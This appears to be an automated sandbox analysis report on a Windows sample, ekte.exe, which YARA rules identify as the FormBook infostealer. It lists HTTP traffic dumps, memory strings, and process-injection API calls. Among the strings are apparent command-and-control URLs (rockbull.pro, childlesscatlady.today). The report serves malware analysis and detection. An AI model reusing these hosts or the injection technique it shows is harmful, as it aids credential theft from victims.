65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Oct 2024 11:16:07 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Oct 2024 11:16:26 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66ad66a8-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Oct 2024 11:16:28 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66ad66a8-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Oct 2024 11:16:31 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66ad66a8-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Oct 2024 11:16:34 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66ad66a8-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000013.00000002.627150947.00000000029DC000.00000004.10000000.00040000.00000000.sdmp, BuhvZTwGQCD.exe, 00000014.00000002.626948129.0000000002BAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.476232018.000000000150C000.00000004.80000000.00040000.00000000.sdmp, ekte.exe, eFDiSxeTfjUqTk.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
            Source: ekte.exe, eFDiSxeTfjUqTk.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
            Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
            Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
            Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
            Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
            Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
            Source: ekte.exe, eFDiSxeTfjUqTk.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
            Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
            Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
            Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
            Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
            Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
            Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
            Source: findstr.exe, 00000013.00000002.627150947.0000000002F56000.00000004.10000000.00040000.00000000.sdmp, BuhvZTwGQCD.exe, 00000014.00000002.626948129.0000000003126000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://rockbull.pro/0804/?o0I8bJWh=7cQ5BE5RBCqgXF7xrBGoHohDXivjQLfe2KgDJ9LuiE6tpBU04a3sAbwq5Q7Yjj3Jj
            Source: ekte.exe, 00000000.00000002.376498845.000000000290A000.00000004.00000800.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409956396.00000000023BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: BuhvZTwGQCD.exe, 00000014.00000002.626793041.0000000000654000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.childlesscatlady.today
            Source: BuhvZTwGQCD.exe, 00000014.00000002.626793041.0000000000654000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.childlesscatlady.today/0l08/
            Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
            Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
            Source: findstr.exe, 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmp, sqlite3.dll.19.drString found in binary or memory: http://www.sqlite.org/copyright.html.
            Source: findstr.exe, 00000013.00000003.464119526.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, 6z95F416.19.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: findstr.exe, 00000013.00000003.464119526.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, 6z95F416.19.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: findstr.exe, 00000013.00000003.464119526.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, 6z95F416.19.drString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: findstr.exe, 00000013.00000003.464119526.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, 6z95F416.19.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: findstr.exe, 00000013.00000003.464119526.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, 6z95F416.19.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: findstr.exe, 00000013.00000003.464119526.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, 6z95F416.19.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
            Source: findstr.exe, 00000013.00000003.464119526.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, 6z95F416.19.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
            Source: findstr.exe, 00000013.00000002.627150947.00000000029DC000.00000004.10000000.00040000.00000000.sdmp, BuhvZTwGQCD.exe, 00000014.00000002.626948129.0000000002BAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.476232018.000000000150C000.00000004.80000000.00040000.00000000.sdmp, ekte.exe, eFDiSxeTfjUqTk.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
            Source: 6z95F416.19.drString found in binary or memory: https://www.google.com/favicon.ico

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 8.2.ekte.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.ekte.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000013.00000002.626531753.00000000000E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.416525445.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.476152152.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.626483718.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.626793041.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.626660475.0000000000220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.626744301.0000000002980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.419884828.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 8.2.ekte.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 8.2.ekte.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000013.00000002.626531753.00000000000E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.416525445.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000017.00000002.476152152.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000013.00000002.626483718.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000014.00000002.626793041.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000013.00000002.626660475.0000000000220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000F.00000002.626744301.0000000002980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.419884828.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\ekte.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_0042C483 NtClose,8_2_0042C483
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009B07AC NtCreateMutant,LdrInitializeThunk,8_2_009B07AC
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009AF9F0 NtClose,LdrInitializeThunk,8_2_009AF9F0
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009AFAE8 NtQueryInformationProcess,LdrInitializeThunk,8_2_009AFAE8
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009AFB68 NtFreeVirtualMemory,LdrInitializeThunk,8_2_009AFB68
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009AFDC0 NtQuerySystemInformation,LdrInitializeThunk,8_2_009AFDC0
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009B00C4 NtCreateFile,8_2_009B00C4
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009B0048 NtProtectVirtualMemory,8_2_009B0048
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009B0078 NtResumeThread,8_2_009B0078
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009B0060 NtQuerySection,8_2_009B0060
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009B01D4 NtSetValueKey,8_2_009B01D4
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009B010C NtOpenDirectoryObject,8_2_009B010C
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009B0C40 NtGetContextThread,8_2_009B0C40
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009B10D0 NtOpenProcessToken,8_2_009B10D0
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009B1148 NtOpenThread,8_2_009B1148
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009AF8CC NtWaitForSingleObject,8_2_009AF8CC
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009AF900 NtReadFile,8_2_009AF900
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009AF938 NtWriteFile,8_2_009AF938
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009B1930 NtSetContextThread,8_2_009B1930
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009AFAB8 NtQueryValueKey,8_2_009AFAB8
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009AFAD0 NtAllocateVirtualMemory,8_2_009AFAD0
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009AFA20 NtQueryInformationFile,8_2_009AFA20
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009AFA50 NtEnumerateValueKey,8_2_009AFA50
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009AFBB8 NtQueryInformationToken,8_2_009AFBB8
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009AFBE8 NtQueryVirtualMemory,8_2_009AFBE8
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009AFB50 NtCreateKey,8_2_009AFB50
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009AFC90 NtUnmapViewOfSection,8_2_009AFC90
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009AFC30 NtOpenProcess,8_2_009AFC30
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009AFC48 NtSetInformationFile,8_2_009AFC48
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009AFC60 NtMapViewOfSection,8_2_009AFC60
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009AFD8C NtDelayExecution,8_2_009AFD8C
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009B1D80 NtSuspendThread,8_2_009B1D80
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009AFD5C NtEnumerateKey,8_2_009AFD5C
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009AFEA0 NtReadVirtualMemory,8_2_009AFEA0
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009AFED0 NtAdjustPrivilegesToken,8_2_009AFED0
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009AFE24 NtWriteVirtualMemory,8_2_009AFE24
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009AFFB4 NtCreateSection,8_2_009AFFB4
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009AFFFC NtCreateProcessEx,8_2_009AFFFC
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009AFF34 NtQueueApcThread,8_2_009AFF34
            Source: C:\Users\user\Desktop\ekte.exeCode function: 0_2_001B44D80_2_001B44D8
            Source: C:\Users\user\Desktop\ekte.exeCode function: 0_2_001B04EC0_2_001B04EC
            Source: C:\Users\user\Desktop\ekte.exeCode function: 0_2_001BA6B00_2_001BA6B0
            Source: C:\Users\user\Desktop\ekte.exeCode function: 0_2_001BD2BD0_2_001BD2BD
            Source: C:\Users\user\Desktop\ekte.exeCode function: 0_2_001BD2D80_2_001BD2D8
            Source: C:\Users\user\Desktop\ekte.exeCode function: 0_2_001B44C90_2_001B44C9
            Source: C:\Users\user\Desktop\ekte.exeCode function: 0_2_001BE6D00_2_001BE6D0
            Source: C:\Users\user\Desktop\ekte.exeCode function: 0_2_001BD7100_2_001BD710
            Source: C:\Users\user\Desktop\ekte.exeCode function: 0_2_001B185A0_2_001B185A
            Source: C:\Users\user\Desktop\ekte.exeCode function: 0_2_001B2A680_2_001B2A68
            Source: C:\Users\user\Desktop\ekte.exeCode function: 0_2_001BEB080_2_001BEB08
            Source: C:\Users\user\Desktop\ekte.exeCode function: 0_2_001BDB480_2_001BDB48
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_004184738_2_00418473
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_004030608_2_00403060
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_004010008_2_00401000
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_0040118B8_2_0040118B
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_004011908_2_00401190
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_0042EAA38_2_0042EAA3
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_004013008_2_00401300
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_004024E08_2_004024E0
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_0040FCAC8_2_0040FCAC
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_0040FCB38_2_0040FCB3
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_004166438_2_00416643
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_0040FED38_2_0040FED3
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_0040DEF78_2_0040DEF7
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_0040DF498_2_0040DF49
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_0040DF538_2_0040DF53
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009BE0C68_2_009BE0C6
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009BE2E98_2_009BE2E9
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_00A663BF8_2_00A663BF
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009E63DB8_2_009E63DB
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009C23058_2_009C2305
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_00A0A37B8_2_00A0A37B
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_00A4443E8_2_00A4443E
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_00A405E38_2_00A405E3
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009DC5F08_2_009DC5F0
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_00A065408_2_00A06540
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009C46808_2_009C4680
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009CE6C18_2_009CE6C1
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_00A626228_2_00A62622
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_00A0A6348_2_00A0A634
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009CC7BC8_2_009CC7BC
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009CC85C8_2_009CC85C
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009E286D8_2_009E286D
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_00A6098E8_2_00A6098E
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009C29B28_2_009C29B2
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_00A549F58_2_00A549F5
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009D69FE8_2_009D69FE
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_00A0C9208_2_00A0C920
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_00A6CBA48_2_00A6CBA4
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_00A46BCB8_2_00A46BCB
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_00A62C9C8_2_00A62C9C
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_00A4AC5E8_2_00A4AC5E
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009F0D3B8_2_009F0D3B
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009CCD5B8_2_009CCD5B
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009F2E2F8_2_009F2E2F
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009DEE4C8_2_009DEE4C
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_00A5CFB18_2_00A5CFB1
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_00A32FDC8_2_00A32FDC
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009D0F3F8_2_009D0F3F
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009ED0058_2_009ED005
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009D905A8_2_009D905A
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_00A3D06D8_2_00A3D06D
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009C30408_2_009C3040
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_00A4D13F8_2_00A4D13F
